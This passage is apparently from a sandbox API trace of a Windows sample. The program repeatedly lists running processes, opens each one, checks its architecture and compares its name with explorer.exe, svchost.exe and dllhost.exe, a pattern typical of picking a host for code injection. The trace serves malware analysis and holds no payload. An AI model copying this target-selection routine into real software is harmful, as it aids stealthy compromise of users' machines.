th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0179.300] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xec [0179.300] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0179.300] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0179.300] CloseHandle (hObject=0xec) returned 1 [0179.300] lstrcmpiA (lpString1="definitely.exe", lpString2="explorer.exe") returned -1 [0179.300] lstrcmpiA (lpString1="definitely.exe", lpString2="svchost.exe") returned -1 [0179.300] lstrcmpiA (lpString1="definitely.exe", lpString2="dllhost.exe") returned -1 [0179.300] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0179.301] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xec [0179.301] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0179.301] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0179.301] CloseHandle (hObject=0xec) returned 1 [0179.301] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="explorer.exe") returned 1 [0179.301] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="svchost.exe") returned -1 [0179.301] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="dllhost.exe") returned 1 [0179.301] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0179.301] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xec [0179.301] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0179.301] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0179.302] CloseHandle (hObject=0xec) returned 1 [0179.302] lstrcmpiA (lpString1="whenever.exe", lpString2="explorer.exe") returned 1 [0179.302] lstrcmpiA (lpString1="whenever.exe", lpString2="svchost.exe") returned 1 [0179.302] lstrcmpiA (lpString1="whenever.exe", lpString2="dllhost.exe") returned 1 [0179.302] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0179.302] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xec [0179.302] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0179.302] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0179.302] CloseHandle (hObject=0xec) returned 1 [0179.302] lstrcmpiA (lpString1="potentially.exe", lpString2="explorer.exe") returned 1 [0179.302] lstrcmpiA (lpString1="potentially.exe", lpString2="svchost.exe") returned -1 [0179.302] lstrcmpiA (lpString1="potentially.exe", lpString2="dllhost.exe") returned 1 [0179.302] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0179.303] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xec [0179.303] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0179.303] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0179.303] CloseHandle (hObject=0xec) returned 1 [0179.303] lstrcmpiA (lpString1="seeker.exe", lpString2="explorer.exe") returned 1 [0179.303] lstrcmpiA (lpString1="seeker.exe", lpString2="svchost.exe") returned -1 [0179.303] lstrcmpiA (lpString1="seeker.exe", lpString2="dllhost.exe") returned 1 [0179.303] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0179.303] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xec [0179.303] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0179.304] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0179.304] CloseHandle (hObject=0xec) returned 1 [0179.304] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="explorer.exe") returned 1 [0179.304] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="svchost.exe") returned -1 [0179.304] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="dllhost.exe") returned 1 [0179.304] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0179.304] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xec [0179.304] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0179.304] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0179.304] CloseHandle (hObject=0xec) returned 1 [0179.304] lstrcmpiA (lpString1="birth bean.exe", lpString2="explorer.exe") returned -1 [0179.304] lstrcmpiA (lpString1="birth bean.exe", lpString2="svchost.exe") returned -1 [0179.304] lstrcmpiA (lpString1="birth bean.exe", lpString2="dllhost.exe") returned -1 [0179.304] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0179.305] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xec [0179.305] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0179.305] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0179.305] CloseHandle (hObject=0xec) returned 1 [0179.305] lstrcmpiA (lpString1="ruby.exe", lpString2="explorer.exe") returned 1 [0179.305] lstrcmpiA (lpString1="ruby.exe", lpString2="svchost.exe") returned -1 [0179.305] lstrcmpiA (lpString1="ruby.exe", lpString2="dllhost.exe") returned 1 [0179.305] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0179.306] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xec [0179.306] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0179.306] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0179.306] CloseHandle (hObject=0xec) returned 1 [0179.306] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="explorer.exe") returned 1 [0179.306] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="svchost.exe") returned 1 [0179.306] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="dllhost.exe") returned 1 [0179.306] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0179.306] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xec [0179.306] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0179.306] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0179.306] CloseHandle (hObject=0xec) returned 1 [0179.306] lstrcmpiA (lpString1="smith.exe", lpString2="explorer.exe") returned 1 [0179.306] lstrcmpiA (lpString1="smith.exe", lpString2="svchost.exe") returned -1 [0179.306] lstrcmpiA (lpString1="smith.exe", lpString2="dllhost.exe") returned 1 [0179.306] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0179.307] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xec [0179.307] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0179.307] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0179.307] CloseHandle (hObject=0xec) returned 1 [0179.307] lstrcmpiA (lpString1="spicedespite.exe", lpString2="explorer.exe") returned 1 [0179.307] lstrcmpiA (lpString1="spicedespite.exe", lpString2="svchost.exe") returned -1 [0179.307] lstrcmpiA (lpString1="spicedespite.exe", lpString2="dllhost.exe") returned 1 [0179.307] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0179.308] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xec [0179.308] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0179.308] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0179.308] CloseHandle (hObject=0xec) returned 1 [0179.308] lstrcmpiA (lpString1="wooden.exe", lpString2="explorer.exe") returned 1 [0179.308] lstrcmpiA (lpString1="wooden.exe", lpString2="svchost.exe") returned 1 [0179.308] lstrcmpiA (lpString1="wooden.exe", lpString2="dllhost.exe") returned 1 [0179.308] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0179.308] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xec [0179.308] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0179.308] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0179.308] CloseHandle (hObject=0xec) returned 1 [0179.308] lstrcmpiA (lpString1="dallasr.exe", lpString2="explorer.exe") returned -1 [0179.308] lstrcmpiA (lpString1="dallasr.exe", lpString2="svchost.exe") returned -1 [0179.308] lstrcmpiA (lpString1="dallasr.exe", lpString2="dllhost.exe") returned -1 [0179.308] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0179.309] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xec [0179.309] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0179.309] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0179.309] CloseHandle (hObject=0xec) returned 1 [0179.309] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="explorer.exe") returned -1 [0179.309] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="svchost.exe") returned -1 [0179.309] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="dllhost.exe") returned -1 [0179.309] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0179.310] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xec [0179.310] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0179.310] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0179.310] CloseHandle (hObject=0xec) returned 1 [0179.310] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="explorer.exe") returned -1 [0179.310] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="svchost.exe") returned -1 [0179.310] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="dllhost.exe") returned -1 [0179.310] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0179.310] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xec [0179.310] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0179.310] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0179.310] CloseHandle (hObject=0xec) returned 1 [0179.310] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="explorer.exe") returned 1 [0179.310] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="svchost.exe") returned -1 [0179.310] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="dllhost.exe") returned 1 [0179.310] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0179.311] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xec [0179.311] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0179.311] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0179.311] CloseHandle (hObject=0xec) returned 1 [0179.311] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="explorer.exe") returned -1 [0179.311] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="svchost.exe") returned -1 [0179.311] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="dllhost.exe") returned 1 [0179.311] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0179.312] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xec [0179.312] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0179.312] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0179.312] CloseHandle (hObject=0xec) returned 1 [0179.312] lstrcmpiA (lpString1="population openings.exe", lpString2="explorer.exe") returned 1 [0179.312] lstrcmpiA (lpString1="population openings.exe", lpString2="svchost.exe") returned -1 [0179.312] lstrcmpiA (lpString1="population openings.exe", lpString2="dllhost.exe") returned 1 [0179.312] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0179.312] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0179.312] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0179.313] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0179.313] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0179.313] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0179.313] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0179.314] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0179.314] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0179.314] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0179.314] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0179.315] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb84) returned 0x0 [0179.315] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0179.315] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xec [0179.315] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0179.315] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0179.315] CloseHandle (hObject=0xec) returned 1 [0179.315] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0179.316] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xec [0179.316] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0179.316] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0179.316] CloseHandle (hObject=0xec) returned 1 [0179.316] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0179.317] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0179.317] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0179.317] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xec [0179.317] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0179.317] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0179.317] CloseHandle (hObject=0xec) returned 1 [0179.317] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0179.317] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0179.318] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xec [0179.318] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0179.318] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0179.318] CloseHandle (hObject=0xec) returned 1 [0179.318] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0179.318] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0179.319] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0xec [0179.319] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0179.319] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0179.319] CloseHandle (hObject=0xec) returned 1 [0179.319] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0179.319] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5b8) returned 0xec [0179.319] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0179.319] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0179.319] CloseHandle (hObject=0xec) returned 1 [0179.319] lstrcmpiA (lpString1="gtjtdfe", lpString2="explorer.exe") returned 1 [0179.320] lstrcmpiA (lpString1="gtjtdfe", lpString2="svchost.exe") returned -1 [0179.320] lstrcmpiA (lpString1="gtjtdfe", lpString2="dllhost.exe") returned 1 [0179.320] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x6c0064, th32ProcessID=0x68006c, th32DefaultHeapID=0x73006f, th32ModuleID=0x2e0074, cntThreads=0x780065, th32ParentProcessID=0x65, pcPriClassBase=0, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0179.320] CloseHandle (hObject=0xe8) returned 1 [0179.320] Sleep (dwMilliseconds=0x3e8) [0180.330] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0180.334] Process32First (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0180.334] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0180.334] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0180.335] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0180.335] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0180.335] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0180.335] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0180.336] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0180.336] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, 